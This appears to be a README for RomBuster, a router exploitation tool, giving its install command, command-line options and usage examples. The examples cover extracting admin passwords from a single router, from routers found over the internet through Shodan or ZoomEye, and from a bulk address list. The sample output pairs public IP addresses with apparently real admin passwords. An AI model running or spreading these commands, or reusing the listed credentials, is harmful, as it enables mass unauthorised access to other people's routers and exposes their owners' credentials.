Is a router exploitation tool that allows to disclosure network router admin password.
Features:
python3 -m pip install git+https://github.com/EntySec/RomBuster
rombuster [-h] [-o OUTPUT] [-i INPUT] [-a ADDRESS] [--shodan SHODAN] [--zoomeye ZOOMEYE] [-p PAGES]
RomBuster is a router exploitation tool that allows to disclosure network router admin password.
optional arguments:
-h, --help show this help message and exit
-o OUTPUT, --output OUTPUT
Output result to file.
-i INPUT, --input INPUT
Input file of addresses.
-a ADDRESS, --address ADDRESS
Single address.
--shodan SHODAN Shodan API key for exploiting devices over Internet.
--zoomeye ZOOMEYE ZoomEye API key for exploiting devices over Internet.
-p PAGES, --pages PAGES
Number of pages you want to get from ZoomEye.
Let’s hack my router just for fun.
rombuster -a 192.168.99.1
Let’s try to use Shodan search engine to exploit routers over Internet.
rombuster --shodan [API-KEY]
$ rombuster --shodan [REDACTED]
[*] Authorizing Shodan by given API key...
[+] Authorization successfully completed!
[+] (187.200.68.1:80) - admin:3931623066
[+] (2.191.126.139:80) - admin:admin
[*] Exploiting...
Let’s try to use opened database of routers.
rombuster -i routers.txt -o passwords.txt
NOTE: It will exploit all routers in routers.txt
list by their addresses and save all obtained passwords to passwords.txt
.